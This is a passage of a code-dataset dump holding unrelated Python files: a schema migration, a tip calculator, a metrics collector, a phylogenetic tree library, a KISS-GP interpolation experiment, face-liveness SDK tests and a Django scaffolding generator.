property_id=\"description\",\n to_cardinality=AtMost(1),\n ),\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"THING\",\n property_id=\"dataInsertedBy\",\n to_cardinality=AtMost(1),\n ),\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"ENTITY\",\n property_id=\"wasGeneratedBy\",\n to_cardinality=AtMost(1),\n ),\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"ENTITY\",\n property_id=\"generatedAtTime\",\n to_cardinality=AtMost(1),\n ),\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"ENTITY\",\n property_id=\"invalidatedAtTime\",\n to_cardinality=AtMost(1),\n ),\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"ACTIVITY\",\n property_id=\"startedAtTime\",\n to_cardinality=AtMost(1),\n ),\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"ACTIVITY\",\n property_id=\"endedAtTime\",\n to_cardinality=AtMost(1),\n ),\n RenameProperty(\n from_name_space=PROV_S,\n from_class=\"AGENT\",\n from_name=\"agentName\",\n to_name_space=PROV_S,\n to_class=\"THING\",\n to_name=\"title\",\n ),\n ],\n)\n","sub_path":"migration/rack/commits/commit833ef18f5024fee255f77887de2c8e9bc136e56d.py","file_name":"commit833ef18f5024fee255f77887de2c8e9bc136e56d.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"65686272","text":"#encoding: UTF-8\n\n# Autor: Maria Fernanda Rodriguez Hernandes, A01371649\n# Descripcion: este es un programa qe calcula el iva la propina y el total de la cuenta de un restaurante .\n\nnumero = int(input(\"Cuntos platillos ordeno? \"))\nsuma = 0\nfor i in range(1, numero + 1):\n platillo = int(input(\"Escriba el costo del \" + str(i) + \"platillo \"))\n suma = suma + platillo\n \n iva = suma*.16\n propina = suma*.15\n total= suma +iva+propina\n\nprint(\"el subtotales:\",suma,\"el iva es:\",iva,\"la propina es:\",propina,\"el total es\",total) \n ","sub_path":"cuenta.py","file_name":"cuenta.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"48389345","text":"import sys\nimport requests\nfrom collections import defaultdict\nimport json\n\nclass getQueryMetrics:\n\tdef __init__(self,host,port,logger):\n\t\tself.prefix='http://{}:{}/ws/v1/timeline/metrics'.format(host,port)\n\t\tself.host_stats=defaultdict(lambda:defaultdict(lambda:defaultdict(lambda:'NA')))\n\t\tself.service_stats=defaultdict(lambda:defaultdict(lambda:'NA'))\n\t\tself.host_stats_max=defaultdict(lambda:defaultdict(lambda:defaultdict(lambda:'NA')))\n\t\tself.service_stats_max=defaultdict(lambda:defaultdict(lambda:'NA'))\n\t\tself.logger=logger\n\t\tself.ifheaderservice=False\n\t\tself.ifheaderhost=False\n\t\tself.ifheaderservicemax=False\n\t\tself.ifheaderhostmax=False\n\n\tdef fetch_stats(self,query,metricType,metricNames,startTime,endTime,dumpfile,hostname=None,precision=None,appId=None):\n\t\turl=self.prefix+'?metricNames={}{}{}{}&startTime={}&endTime={}'.format(metricNames,'&appId='+appId if appId else '','&hostname='+hostname if hostname else '','&precision='+precision if precision else '',startTime,endTime)\n\t\tresp=requests.get(url,headers={'Accept':'application/json'})\n\t\tself.logger.info(url)\n\t\tif resp.status_code==200:\n\t\t\tself.addToMetrics(query,metricType,json.loads(resp.content)['metrics'])\n\t\tself.dumptofile(query,metricType,metricNames,dumpfile)\n\n\tdef addToMetrics(self,query,metricType,metricList):\n\t\tif metricType=='host':\n\t\t\tfor stat in metricList:\n\t\t\t\tif len(stat['metrics'].keys())>0:\n\t\t\t\t\tself.host_stats[query][stat['hostname']][stat['metricname']]=str(int(sum(stat['metrics'].values())/len(stat['metrics'].keys())))\n\t\t\t\t\tself.host_stats_max[query][stat['hostname']][stat['metricname']]=str(max(stat['metrics'].values()))\n\t\telif metricType=='service':\n\t\t\tfor stat in metricList:\n\t\t\t\tif len(stat['metrics'].keys())>0:\n\t\t\t\t\tself.service_stats[query][stat['metricname']]=str(int(sum(stat['metrics'].values())/len(stat['metrics'].keys())))\n\t\t\t\t\tself.service_stats_max[query][stat['metricname']]=str(max(stat['metrics'].values()))\n\n\tdef dumptofile(self,query,metricType,metricNames,dumpfile):\n\t\tif metricType=='host':\n\t\t\tself.dumpHostStats(query,metricNames,dumpfile)\n\t\telif metricType=='service':\n\t\t\tself.dumpServiceStats(query,metricNames,dumpfile)\n\t\n\tdef dumpServiceStats(self,query,metricList,dumpfile):\n\t\twith open(dumpfile,'a+') as f:\n\t\t\tif not self.ifheaderservice:\n\t\t\t\tf.write(','.join(['query']+sorted(metricList.split(',')))+'\\n')\n\t\t\t\tself.ifheaderservice=True\n\t\t\tf.write(','.join([query]+[str(self.service_stats[query][key]) for key in sorted(metricList.split(','))])+'\\n')\n\t\twith open('_'.join(['max',dumpfile]),'a+') as f:\n\t\t\tif not self.ifheaderservicemax:\n\t\t\t\tf.write(','.join(['query']+sorted(metricList.split(',')))+'\\n')\n\t\t\t\tself.ifheaderservicemax=True\n\t\t\tf.write(','.join([query]+[str(self.service_stats_max[query][key]) for key in sorted(metricList.split(','))])+'\\n')\n\n\tdef dumpHostStats(self,query,metricList,dumpfile):\n\t\twith open(dumpfile,'a+') as f:\n\t\t\tif not self.ifheaderhost:\n\t\t\t\tf.write('query,'+','.join(['-'.join([host,metric]) for host in sorted(self.host_stats[query].keys()) for metric in sorted(metricList.split(','))])+'\\n')\n\t\t\t\tself.ifheaderhost=True\n\t\t\tf.write(','.join([query]+[str(self.host_stats[query][host][metric]) for host in sorted(self.host_stats[query].keys()) for metric in sorted(metricList.split(','))])+'\\n')\n\t\twith open('_'.join(['max',dumpfile]),'a+') as f:\n\t\t\tif not self.ifheaderhostmax:\n\t\t\t\tf.write('query,'+','.join(['-'.join([host,metric]) for host in sorted(self.host_stats_max[query].keys()) for metric in sorted(metricList.split(','))])+'\\n')\n\t\t\t\tself.ifheaderhostmax=True\n\t\t\tf.write(','.join([query]+[str(self.host_stats_max[query][host][metric]) for host in sorted(self.host_stats_max[query].keys()) for metric in sorted(metricList.split(','))])+'\\n')\n\n","sub_path":"collect_metrics.py","file_name":"collect_metrics.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"601846212","text":"import json\nfrom enum import Enum\nimport json\nimport pandas as pd\n\nclass NodeType(Enum):\n NODE = 0\n LEAF = 1\n\n\nclass Node():\n def __init__(self, data_dict = None):\n self.parent = None\n self.children = []\n self.branch_attrs = {}\n self.node_attrs = {}\n self.name = None\n self.type = None\n\n if data_dict:\n self.from_dict(data_dict)\n\n def to_dict(self):\n d = {'branch_attrs': self.branch_attrs,\n 'node_attrs': self.node_attrs,\n 'name': self.name}\n if self.children:\n d['children'] = [child.to_dict() for child in self.children]\n\n return d\n\n def from_dict(self, d):\n if 'branch_attrs' in d:\n self.branch_attrs = d['branch_attrs']\n if 'node_attrs' in d:\n self.node_attrs = d['node_attrs']\n self.name = d['name']\n\n if 'children' in d and len(d['children']) > 0:\n self.children = [Node(c) for c in d['children']]\n else:\n self.children = []\n for c in self.children:\n c.parent = self\n\n if self.children:\n self.type = NodeType.NODE\n else:\n self.type = NodeType.LEAF\n\n def descendents(self):\n return self.children + [node for c in self.children for node in c.descendents()]\n\n def get_attr(self, attr):\n if attr in self.branch_attrs:\n if isinstance(self.branch_attrs[attr], dict):\n return self.branch_attrs[attr]['value']\n else:\n return self.branch_attrs[attr]\n\n if attr in self.node_attrs:\n if isinstance(self.node_attrs[attr], dict):\n return self.node_attrs[attr]['value']\n else:\n return self.node_attrs[attr]\n\n def set_attr(self, attr, value, attr_type='node'):\n if value is None:\n return\n if attr_type == 'node':\n self.node_attrs[attr] = {'value': value}\n else:\n self.branch_attrs[attr] = {'value': value}\n\n\n def check(self, conditions):\n \"\"\"Check if the node satisfies conditions, encoded as\n {attr: value} elements in a dict.\"\"\"\n for attr in conditions.keys():\n if self.get_attr(attr) != conditions[attr]:\n return False\n return True\n\nclass Tree():\n def __init__(self, data_dict = None):\n self.root = None\n self.nodes = []\n if data_dict:\n self.from_dict(data_dict)\n\n def to_dict(self):\n return self.root.to_dict()\n\n def from_dict(self, data_dict):\n self.root = Node(data_dict)\n self.nodes = [self.root] + self.root.descendents()\n\n def set_node_attr(self, attr, state):\n for node in self.nodes:\n node.node_attrs[attr] = state\n\n def subset_tree(self, nodes_to_keep):\n for node in self.nodes:\n node.children = [c for c in node.children if c in nodes_to_keep]\n self.nodes = nodes_to_keep\n\n def trim_terminal_nodes(self):\n nodes_to_keep = [node for node in self.nodes if\n node.type == NodeType.LEAF or len(node.children) > 0]\n self.subset_tree(nodes_to_keep)\n\n def add_metadata(self, df):\n \"\"\"Merge metadata file containing a 'strain' column.\"\"\"\n df.rename({col: '_'.join(col.split()) for col in df.columns},\n axis=1,\n inplace=True)\n df = df.set_index('strain')\n\n for node in self.nodes:\n if node.name in df.index:\n for col in df.columns:\n val = df.loc[node.name, col]\n try:\n if not pd.isnull(val):\n node.set_attr(col, val)\n except:\n print(\"bad value\")\n print(col, val)\n continue\n\n def filter_nodes(self, attr, value):\n return [node for node in self.nodes if\n node.get_attr(attr) == value]\n\n def rename_nodes(self, attr, save_attr=None, filter=None):\n \"\"\"Reset name to value of attr field.\n If save_attr is specified, save current name to that field.\"\"\"\n for node in self.nodes:\n val = node.get_attr(attr)\n if filter and not node.check(filter):\n continue\n if val and val != \"None\":\n sanitized_val = \"-\".join(val.split())\n print(\"renaming node \", node.name, \" to \", sanitized_val)\n if save_attr:\n node.set_attr(save_attr, node.name)\n node.name = sanitized_val\n\n def drop_by_name(self, names_to_drop, verbose=False):\n if verbose:\n n_leaves_before = self.n_leaves()\n\n nodes_to_keep = [n for n in self.nodes if n.type == NodeType.LEAF and\n n.name not in names_to_drop]\n nodes_to_keep = walk_to_root(nodes_to_keep)\n if self.root not in nodes_to_keep:\n nodes_to_keep.append(self.root)\n\n self.subset_tree(nodes_to_keep)\n\n if verbose:\n n_leaves_after = self.n_leaves()\n\n print(\"Removing \", n_leaves_before - n_leaves_after,\n \" of \", n_leaves_before, \" genomes.\")\n\n def n_leaves(self):\n return len([n for n in self.nodes if n.type == NodeType.LEAF])\n\n\ndef walk_to_root(nodes):\n stack = nodes.copy()\n done = []\n while stack:\n node = stack.pop()\n if node.parent and node.parent not in stack and node.parent not in done:\n stack.append(node.parent)\n done.append(node)\n return done\n\n\ndef walk_to_leaves(nodes):\n stack = nodes.copy()\n done = []\n while stack:\n node = stack.pop()\n for child in node.children:\n if child not in stack and child not in done:\n stack.append(child)\n done.append(node)\n return done\n\n\ndef walk_down(nodes, mode = \"steps\", depth = 1, filter = None):\n if mode == 'steps':\n levels = [nodes.copy()]\n for i in range(depth):\n next_level = []\n for node in levels[-1]:\n next_level.extend(node.children)\n levels.append(next_level)\n done = [node for level in levels for node in level]\n if mode == \"mutations\":\n levels = [nodes.copy()] + [[]]*depth\n done = nodes.copy()\n for i in range(depth + 1):\n j = 0\n while j < len(levels[i]):\n node = levels[i][j]\n for c in node.children:\n distance = i + num_mutations(c)\n if distance < depth + 1:\n if c not in done:\n levels[distance].append(c)\n done.append(c)\n j += 1\n\n if filter:\n done = [n for n in done if filter(n)]\n\n return done\n\ndef num_mutations(node):\n if 'mutations' in node.branch_attrs:\n if 'nuc' in node.branch_attrs['mutations']:\n return len(node.branch_attrs['mutations']['nuc'])\n return 0\n\n\nclass Auspice():\n def __init__(self, filename):\n self.tree = None\n self.js = None\n self.read(filename)\n\n def read(self, filename):\n with open(filename, 'r') as fp:\n self.js = json.load(fp)\n self.tree = Tree(self.js['tree'])\n\n def write(self, filename):\n with open(filename, 'w') as fp:\n json.dump(\n {\"meta\": self.js['meta'],\n \"version\": self.js['version'],\n \"tree\": self.tree.to_dict() if self.tree else self.js['tree']},\n fp,\n indent=2\n )","sub_path":"auspicemunging/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"307323831","text":"from __future__ import absolute_import\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics.pairwise import rbf_kernel as RBF\nplt.style.use('ggplot')\n\ndef regular_grid_interpolation(Z, X):\n '''\n computes interpolation matrix so that X approx W*Z.\n assumes that Z forms a regular grid and does interpolation one dimension at a time\n which interpolation method used for each dimension decided in interpolation_np\n (currently only implemented for equidistant grids in each dimension)\n :param Z: list of p vectors of length M^(1/p)\n :param X: matrix of size N x p\n :return: indices, values and shape for a sparse matrix W: N x M\n '''\n N = X.shape[0] # number of target points\n p = X.shape[1] # number of dimensions\n\n s = 1 # stride to get index right\n M = 1 # number of source grid points\n for i in range(p):\n M *= len(Z[i])\n shape = (N, M) # shape of interpolation matrix\n\n # loop over all dimensions and interpolate each and update indices and coefficients\n for i in range(p):\n ind, val = interpolation_np(Z[i], X[:, i])\n nr_coefficents = ind.shape[1]\n print(nr_coefficents)\n if i == 0:\n values = val\n indices = np.zeros((N, 1))\n else:\n # for each new dimension get new coefficients and multiply with the old ones\n values = np.tile(values[:, :, None], (1, 1, nr_coefficents)) * np.tile(\n np.reshape(val, (N, 1, nr_coefficents)), (1, values.shape[1], 1))\n values = np.reshape(values, (N, -1), order=\"F\")\n # get the new indices for which source points to use and use with the old ones\n indices = np.tile(np.reshape(indices, (-1, 1), order=\"F\"), (1, nr_coefficents)) + s * np.tile(ind, (\n int(values.shape[1] / nr_coefficents), 1))\n s *= len(Z[i])\n ind0 = np.tile(np.arange(N), (1, values.shape[1])) # get indices for which target data points\n values = np.reshape(values, (-1, 1), order=\"F\")\n indices = np.concatenate([np.reshape(ind0, (-1, 1)), np.reshape(indices, (-1, 1), order=\"F\")],1)\n return indices, values, shape\n\n\ndef interpolation_np(source, target):\n '''\n interpolation using numpy assuming 1D points and inducing points equidistant\n for now also assuming only interpolation and no extrapolation\n '''\n n = target.shape[0]\n source = source.flatten()\n target = target.flatten()\n shape = (target.shape[0], source.shape[0])\n delta_s = source[1] - source[0] # distance between each point in the source grid assuming equidistant\n j = np.floor((target - source[0]) / delta_s) # index of the smaller inducing point closest to the target points\n j = j.astype(int)\n j = j.flatten()\n\n rel_dist_to_j = (target - source[0]) / delta_s - j # relative distance to closest smallest point\n rel_dist_to_j = rel_dist_to_j.flatten()\n\n # cubic interpolation\n\n nr_coefficients = 4\n which_coefficients = np.arange(-1,3)\n '''\n\n # linear interpolation\n nr_coefficients = 2\n which_coefficients = np.arange(0, 2)\n '''\n\n indices = np.zeros((nr_coefficients * n, 2))\n values = np.zeros((nr_coefficients * n))\n C = np.zeros((target.shape[0], nr_coefficients)) # interpolation coefficients matrix\n I = np.zeros((target.shape[0], nr_coefficients)) # index matrix\n\n # linear interpolation\n # W[np.arange(target.shape[0]),j[:,0]] = 1-rel_dist_to_j\n # W[np.arange(target.shape[0]),j[:,0]+1] = rel_dist_to_j\n\n # coefficients using cubic interpolation (Keys)\n for k in range(nr_coefficients):\n i = which_coefficients[k]\n print(i)\n C[:, k] = cubic_coefficients_np(i - rel_dist_to_j)\n I[:, k] = j + i\n\n return I, C\n\n\ndef linear_coefficients_np(d):\n '''\n computes linear interpolation coefficients\n input\n d: distance to target points\n returns\n w: coefficients\n '''\n w = np.zeros(np.shape(d))\n d = abs(np.copy(d))\n w[(d <= 1) & (d > 0)] = 1 - d[(d <= 1) & (d > 0)]\n\n return w\n\n\ndef cubic_coefficients_np(d):\n '''\n computes interpolation coefficients according to Keys' cubic interpolation\n input\n d: distance to target points\n returns\n w: coefficients\n '''\n w = np.zeros(np.shape(d))\n d = abs(np.copy(d))\n w[(d <= 1) & (d > 0)] = ((1.5 * d[(d <= 1) & (d > 0)] - 2.5) * d[(d <= 1) & (d > 0)]) * d[(d <= 1) & (d > 0)] + 1\n w[(1 < d) & (d <= 2)] = ((-0.5 * d[(1 < d) & (d <= 2)] + 2.5) * d[(1 < d) & (d <= 2)] - 4) * d[\n (1 < d) & (d <= 2)] + 2\n\n return w\n\n\ndef kernel_interpolation(source, target):\n '''\n kernel interpolation assuming 1D points and inducing points equidistant\n for now also assuming only interpolation and no extrapolation\n '''\n delta_s = source[1] - source[0] # distance between each point in the inducing points grid s assuming equidistant\n j = np.floor((target - source[0]) / delta_s) # index of the smaller inducing point closest to the target points\n j = j.astype(int)\n j = j.flatten()\n rel_dist_to_j = (target - source[0]) / delta_s - j # relative distance to closest smallest point\n rel_dist_to_j = rel_dist_to_j.flatten()\n W = np.zeros((target.shape[0], source.shape[0])) # interpolation matrix\n\n # linear interpolation\n # W[np.arange(target.shape[0]),j[:,0]] = 1-rel_dist_to_j\n # W[np.arange(target.shape[0]),j[:,0]+1] = rel_dist_to_j\n\n # coefficients using cubic interpolation (Keys)\n for i in range(-2, 2):\n i = -i\n print(i)\n W[np.arange(target.shape[0]), j + i] = cubic_coefficients_np(-rel_dist_to_j + i)\n\n return W\n\n\ndef cubic_coefficients(d):\n '''\n d: distance to target points\n w: coefficients\n '''\n w = np.zeros(np.shape(d))\n d = abs(np.copy(d))\n w[d <= 1] = ((1.5 * d[d <= 1] - 2.5) * d[d <= 1]) * d[d <= 1] + 1\n w[(1 < d) & (d <= 2)] = ((-0.5 * d[(1 < d) & (d <= 2)] + 2.5) * d[(1 < d) & (d <= 2)] - 4) * d[\n (1 < d) & (d <= 2)] + 2\n\n return w\n\n# construct training points according to 4.1 in KISS-GP\nN = 1000\nX = np.sqrt(25)*np.random.standard_normal(N)\nprint(X.max())\nprint(X.min())\nX.sort()\n\n# inducing points\nZ = np.linspace(X.min()-2,X.max()+2,40)\n\n# interpolation weight matrix\nindices, values, shape = regular_grid_interpolation([Z],np.reshape(X, (-1,1)))\nW = np.zeros(shape)\nW[indices.astype(int)[:,0],indices.astype(int)[:,1]] = np.reshape(values, (-1))\nprint(W)\n\nW2 = kernel_interpolation(Z,X)\nprint(W2)\nKx = RBF(X.reshape(-1,1), gamma = 0.01) # RBF kernel using training points\nKz = RBF(Z.reshape(-1,1), gamma = 0.01) # RBF kernel using inducing points\nK_ski = np.dot(W,np.dot(Kz,W.transpose())) # SKI kernel according to KISS-GP\n\n# plot K_true, K_ski and |K_true - K_ski| using pcolormesh, result similar to KISS-GP article\n# However, not clear which gamma they use or how they choose the inducing points\nplt.pcolormesh(Kx)\nplt.colorbar()\nplt.title('$K_{true}$')\nplt.figure()\nplt.pcolormesh(K_ski)\nplt.colorbar()\nplt.title('$K_{SKI}$')\nplt.figure()\nplt.pcolormesh(np.abs(Kx-K_ski))\nplt.colorbar()\nplt.title('$|K_{true} - K_{SKI}|$')\nplt.show()","sub_path":"test_interpolation.py","file_name":"test_interpolation.py","file_ext":"py","file_size_in_byte":7160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"69603778","text":"import os\n\nMENUS = [\n 'members',\n ('research', ['methods', 'publications']),\n ('projects', ['topics', 'FAQ']),\n 'courses',\n 'software',\n 'contact',\n ('FAQ', ['datamining', 'admission'])\n]\n\nSERVER = {\n 'host': '0.0.0.0',\n 'port': 8088,\n 'debug': True,\n}\n\nAPP_URL = 'http://dmlab.snu.ac.kr'\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\nAPP_STATIC = os.path.join(APP_ROOT, 'static')\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"264278734","text":"import unittest\nimport argparse\nimport sys\nimport os\nfrom license_helper import make_activation, ActivationLicenseError\n\n# if FaceEngine is not installed within the system, add the directory with FaceEngine*.so to system paths\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-b\", \"--bind-path\", type=str,\n help=\"path to dir with FaceEngine*.so file - binding of luna-sdk\")\n\nargs = parser.parse_args()\n\nif len(sys.argv) == 1 or not args.bind_path or not os.path.isdir(args.bind_path):\n parser.print_help(sys.stderr)\n sys.exit(1)\n\npath_to_binding = args.bind_path\nprint(\"Directory {0} with python bindings of FaceEngine was included\".format(path_to_binding))\nprint(sys.argv)\n\nsys.path.append(path_to_binding)\n\n# if FaceEngine is installed only this string of code is required for module importing\nimport FaceEngine as fe\n\n# erase two first arguments for unittest argument parsing\ndel(sys.argv[1])\ndel(sys.argv[1])\n\n\ndef createLivenessEngine(preparedConfig):\n faceEngine = fe.createFaceEngine(\"data\")\n faceEngine.setSettingsProvider(preparedConfig)\n if not make_activation(faceEngine):\n raise ActivationLicenseError(\"License is not activated!\")\n liveness_engine = fe.createLivenessEngine(faceEngine, \"data\")\n return liveness_engine\n\ntest_data_path = \"testData\"\ndataPath = \"data\"\n\ndef print_landmarks(landmarks, message=\"\"):\n print(message)\n for i in range(len(landmarks)):\n print(landmarks[i])\n\n#implementation\nprint(fe.LA_PITCH_DOWN)\nprint(fe.LA_PITCH_UP)\nprint(fe.LA_YAW_LEFT)\nprint(fe.LA_YAW_RIGHT)\nprint(fe.LA_SMILE)\nprint(fe.LA_MOUTH)\nprint(fe.LA_EYEBROW)\nprint(fe.LA_EYE)\nprint(fe.LA_ZOOM)\nprint(fe.LA_INFRARED)\nprint(fe.LA_EYEBROW)\n\nprint(fe.CLA_DEPTH)\n\nprint(fe.LSDKError.Ok)\nprint(fe.LSDKError.NotInitialized)\nprint(fe.LSDKError.NotReady)\nprint(fe.LSDKError.PreconditionFailed)\nprint(fe.LSDKError.Internal)\nangles = fe.Angles()\nangles.yaw = 10\nangles.pitch = 20\nangles.roll = 30\nprint(\"angles {0}, {1} {2}\".format(angles.yaw, angles.pitch, angles.roll))\nscores = fe.Scores()\nscores.smile = 0.3\nscores.mouth = 0.3\nscores.eyebrow = 0.4\nprint(\"scores {0}, {1} {2}\".format(scores.smile, scores.mouth, scores.eyebrow))\neye_states = fe.EyeStates()\neye_states.left = 0\neye_states.right = 1\nprint(\"eye_states {0}, {1} \".format(eye_states.left, eye_states.right))\n\nconfigPath = os.path.join(\"data\", \"faceengine.conf\")\nconfig = fe.createSettingsProvider(configPath)\nliveness_engine = createLivenessEngine(config)\nliveness = liveness_engine.createLiveness(fe.LA_INFRARED)\ncomplex_liveness = liveness_engine.createComplexLiveness(fe.CLA_DEPTH)\nimage = fe.Image()\nimage_path = test_data_path + \"/image1.ppm\"\nerr = image.load(image_path)\nif err.isError:\n exit(-1)\nerr, success = liveness.update(image)\nresult_det, detection = liveness.getDetection()\nif result_det:\n print(detection)\nelse:\n print(\"detection was not got\")\n\n\nresult_warp, warp = liveness.getWarp()\nprint(\"result_warp success:\", result_warp, warp.getWidth(), warp.getHeight())\nresult, landmarks68 = liveness.getLandmarks68()\nprint(\"landmarks68 success:\", result)\nresult, landmarks5 = liveness.getLandmarks5()\nprint_landmarks(landmarks5, \"landmarks5:\")\nprint(\"landmarks5 success:\", result)\nresult, irisLandmarks = liveness.getIrisLandmarks()\nprint(\"Irislandmarks success:\", result)\nresult, angles = liveness.getAngles()\nprint(\"Angles success:\", result)\nresult, scores = liveness.getScores()\nprint(\"Scores success:\", result)\nresult, eye_states = liveness.getEyestates()\nprint(\"Eye_states success:\", result)\nprint(err.what, success)\nliveness.reset()\n\nresult, detection = complex_liveness.getDetection()\nresult, warp = complex_liveness.getWarp()\nresult, landmarks68 = complex_liveness.getLandmarks68()\nresult, landmarks5 = complex_liveness.getLandmarks5()\nresult, irisLandmarks = complex_liveness.getIrisLandmarks()\nresult, angles = complex_liveness.getAngles()\nresult, scores = complex_liveness.getScores()\nresult, eye_states = complex_liveness.getEyestates()\ncomplex_liveness.reset()\n\n\nclass TestFaceEngineLiveness(unittest.TestCase):\n\n def simpleLivenessTest(self, type, path):\n configPath = os.path.join(\"data\", \"faceengine.conf\")\n config = fe.createSettingsProvider(configPath)\n config.setValue(\"system\", \"defaultDetectorType\", \"FaceDetV1\")\n liveness_engine = createLivenessEngine(config)\n liveness = liveness_engine.createLiveness(type)\n image_list = fe.loadFrameSequence(path)\n result = None\n success = False\n for image in image_list:\n if not image.isValid():\n print(\"Image is not valid\")\n continue\n result, success = liveness.update(image)\n self.assertTrue(result.isOk)\n self.assertTrue(success)\n\n def complexLivenessTest(self, type, color_path, depth_path):\n configPath = os.path.join(\"data\", \"faceengine.conf\")\n config = fe.createSettingsProvider(configPath)\n config.setValue(\"system\", \"defaultDetectorType\", \"FaceDetV1\")\n config.setValue(\"DepthEstimator::Settings\", \"zeroDepthThreshold\", 0.5)\n liveness_engine = createLivenessEngine(config)\n complex_liveness = liveness_engine.createComplexLiveness(type)\n color_image_list = fe.loadFrameSequence(color_path)\n depth_image_list = fe.loadFrameSequence(depth_path)\n result = None\n success = False\n self.assertEqual(len(color_image_list), len(depth_image_list))\n for i, _ in enumerate(color_image_list):\n if not color_image_list[i].isValid():\n print(\"Image is not valid\")\n continue\n if not depth_image_list[i].isValid():\n print(\"Image is not valid\")\n continue\n result, success = complex_liveness.update(color_image_list[i], depth_image_list[i])\n self.assertTrue(result.isOk)\n self.assertTrue(success)\n\n def test_liveness(self):\n self.simpleLivenessTest(fe.LA_INFRARED, test_data_path + \"/infrared.bin\")\n self.simpleLivenessTest(fe.LA_YAW_RIGHT, test_data_path + \"/yawright.bin\")\n self.simpleLivenessTest(fe.LA_YAW_LEFT, test_data_path + \"/yawleft.bin\")\n self.simpleLivenessTest(fe.LA_PITCH_UP, test_data_path + \"/pitchup.bin\")\n self.simpleLivenessTest(fe.LA_PITCH_DOWN, test_data_path + \"/pitchdown.bin\")\n self.simpleLivenessTest(fe.LA_MOUTH, test_data_path + \"/mouth.bin\")\n self.simpleLivenessTest(fe.LA_EYEBROW, test_data_path + \"/eyebrow.bin\")\n self.simpleLivenessTest(fe.LA_EYE, test_data_path + \"/eye.bin\")\n self.simpleLivenessTest(fe.LA_ZOOM, test_data_path + \"/zoom.bin\")\n self.simpleLivenessTest(fe.LA_SMILE, test_data_path + \"/smile.bin\")\n self.complexLivenessTest(fe.CLA_DEPTH, test_data_path + \"/color.bin\", test_data_path + \"/depth.bin\")\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_liveness.py","file_name":"test_liveness.py","file_ext":"py","file_size_in_byte":6888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"91008628","text":"import os\n\ndef write_template_files(lstclassnames):\n\touttxt = '''\\\n\n\n\n\n\n\n{% block content %}\n{% endblock %}\n\n\n'''\n\tf=open('templates%sbase.html' % (os.sep, ), 'w')\n\tf.write(outtxt)\n\tf.close()\n\n\tfor iter in lstclassnames:\n\t\touttxt = '''\\\n{% extends \"base.html\" %}\n{% block content %}\n
\n{% csrf_token %}\n{{ form.as_p }}\n\n
\n{% endblock %}\t\n'''.replace('{0}', iter.lower()) #.format(iter.lower(), iter)\n\t\tf=open('templates%sedit_%s.html' % (os.sep, iter.lower()), 'w')\n\t\tf.write(outtxt)\n\t\tf.close()\n\t\t\n\t\touttxt = '''\\\n{% extends \"base.html\" %}\n{% load render_table from django_tables2 %}\n{% block content %}\n\n{% render_table data %}\n{% endblock %}\n'''\n\t\tf=open('templates%slist_%s.html' % (os.sep, iter.lower()), 'w')\n\t\tf.write(outtxt)\n\t\tf.close()\n\ndef make_forms_file(lstclassnames):\n\tretval = '''\\\nfrom django.forms import ModelForm\nfrom {0}.models import {1}\n\nclass BaseForm(ModelForm):\n\trequired_css_class='required'\n\tclass Meta:\n\t\tabstract=True\n\n'''.format(\n\t\tos.path.dirname(os.path.realpath(__file__)).split(os.sep)[-1], #should we use os.getcwd instead of dirname of realpath?\n\t\t', '.join(lstclassnames)\n\t)\n\tfor iter in lstclassnames:\n\t\tretval = retval + '''\\\nclass {0}Form(BaseForm):\n\tclass Meta:\n\t\tmodel={0}\n\n'''.format(iter)\n\treturn retval\n\ndef make_views_file(lstclassnames):\n\tretval = '''\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom {0}.forms import {2}\nfrom {0}.models import {1}\nfrom django.shortcuts import render\nfrom django.core.urlresolvers import reverse\nfrom {0} import forms\n\ndef home(request):\n\treturn HttpResponse('Home page under construction', mimetype='text/plain')\n\n'''.format(\n\t\tos.path.dirname(os.path.realpath(__file__)).split(os.sep)[-1],\n\t\t', '.join(lstclassnames),\n\t\t'Form, '.join(lstclassnames)\n\t)\n\tfor iter in lstclassnames:\n\t\tretval = retval + '''\ndef {0}_edit(request, id=0):\n\tif int(id)>0:\n\t\tobj={1}.objects.get(id=id)\n\t\tform=forms.{1}Form(initial=obj.__dict__)\n\t\tdel(obj)\n\telse:\n\t\tform=forms.{1}Form()\n\treturn render(request, 'edit_{0}.html', locals())\n\ndef {0}_save(request, id=0):\n\tform=forms.{1}Form(request.POST)\n\tif int(id)>0:\n\t\tform=forms.{1}Form(request.POST, instance={1}.objects.get(id=id))\n\tif form.is_valid():\n\t\t#objid=int(form.cleaned_data['id'])\n\t\t#if objid>0:\n\t\t#\tform.instance={1}.objects.get(id=objid)\n\t\tform.save()\n\t\treturn HttpResponseRedirect(reverse('{0}_list'))\n\telse:\n\t\treturn render(request, 'edit_{0}.html', locals())\n\t\ndef {0}_list(request):\n\treturn render(request, 'list_{0}.html', {{'data': {1}.objects.all()}})\n\t\ndef {0}_remove(request):\n\tpass\n\t\\\n'''.format(iter.lower(), iter)\n\treturn retval\n\ndef make_urls_file(lstclassnames):\n\tretval = ''\n\tretval = retval + 'from {0} import views'.format(\n\t\tos.path.dirname(os.path.realpath(__file__)).split(os.sep)[-1]\n\t) + 